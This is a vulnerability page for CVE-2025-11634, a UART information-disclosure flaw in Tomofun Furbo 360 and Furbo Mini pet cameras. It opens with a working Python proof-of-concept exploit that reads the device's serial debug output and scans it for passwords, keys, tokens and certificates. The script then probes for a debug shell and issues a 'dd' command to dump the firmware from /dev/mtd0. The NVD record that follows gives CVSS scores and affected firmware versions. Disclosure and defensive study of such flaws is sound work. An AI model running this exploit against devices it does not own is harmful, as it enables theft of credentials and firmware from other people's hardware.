CVE-2025-11634

# CVE-2025-11634 PoC - UART Interface Information Disclosure # Target: Tomofun Furbo 360 (FB0035_FW_036 and below) # Target: Tomofun Furbo Mini (MC0020_FW_074 and below) import serial import time # Step 1: Connect to UART interface via USB-to-Serial adapter # Hardware: FTDI FT232R, CP2102, or CH340 USB-to-UART bridge # Pinout: Connect TX->RX, RX->TX, GND->GND on device's debug pins def exploit_uart_info_disclosure(port='/dev/ttyUSB0', baudrate=115200): """ Exploit UART interface to extract sensitive information from Furbo 360 / Furbo Mini devices. """ try: # Open serial connection to UART interface ser = serial.Serial( port=port, baudrate=baudrate, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=5 ) print(f"[*] Connected to UART on {port} at {baudrate} baud") # Step 2: Trigger device reboot or interrupt to capture boot logs # Power cycle the device or send break signal ser.send_break() time.sleep(2) # Step 3: Capture boot logs and debug output print("[*] Capturing boot logs...") boot_logs = "" start_time = time.time() while time.time() - start_time < 30: if ser.in_waiting > 0: data = ser.read(ser.in_waiting).decode('utf-8', errors='ignore') boot_logs += data # Look for sensitive information patterns if any(keyword in data for keyword in ['password', 'key', 'secret', 'token', 'cert']): print(f"[!] Sensitive data found: {data}") # Step 4: Try to access shell or dump firmware print("[*] Attempting to access debug shell...") ser.write(b'\n') time.sleep(1) ser.write(b'help\n') time.sleep(1) response = ser.read(ser.in_waiting).decode('utf-8', errors='ignore') print(f"[*] Shell response: {response}") # Step 5: Dump firmware if shell access is available if '#' in response or '$' in response: print("[*] Shell access obtained, dumping firmware...") ser.write(b'dd if=/dev/mtd0 of=/tmp/firmware_dump.bin\n') time.sleep(10) ser.close() return boot_logs except serial.SerialException as e: print(f"[-] Serial connection error: {e}") return None if __name__ == "__main__": # Usage: python exploit.py --port /dev/ttyUSB0 --baud 115200 import argparse parser = argparse.ArgumentParser(description='CVE-2025-11634 UART Info Disclosure PoC') parser.add_argument('--port', default='/dev/ttyUSB0', help='Serial port') parser.add_argument('--baud', type=int, default=115200, help='Baud rate') args = parser.parse_args() result = exploit_uart_info_disclosure(args.port, args.baud) if result: print(f"[*] Captured {len(result)} bytes of data")

{"cve": {"id": "CVE-2025-11634", "sourceIdentifier": "[email protected]", "published": "2025-10-12T13:15:36.060", "lastModified": "2025-10-30T19:45:34.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Tomofun Furbo 360 and Furbo Mini. This affects an unknown part of the component UART Interface. The manipulation results in information disclosure. An attack on the physical device is feasible. The exploit has been released to the public and may be exploited. The firmware versions determined to be affected are Furbo 360 up to FB0035_FW_036 and Furbo Mini up to MC0020_FW_074. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 2.1, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_mini_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "074", "matchCriteriaId": "06B19876-699B-455F-945F-AF26C60BF965"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_mini:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F549356-AF78-447C-8689-D9DD1A9202DC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_360_dog_camera_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "036", "matchCriteriaId": "6DDA1333-73CD-494A-8DD3-9543FDFD47A7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_360_dog_camera:*:*:*:*:*:*:*:*", "matchCriteriaId": "08CA8E77-413F-4849-A110-49DB5DDA29C5"}]}]}], "references": [ ... (truncated)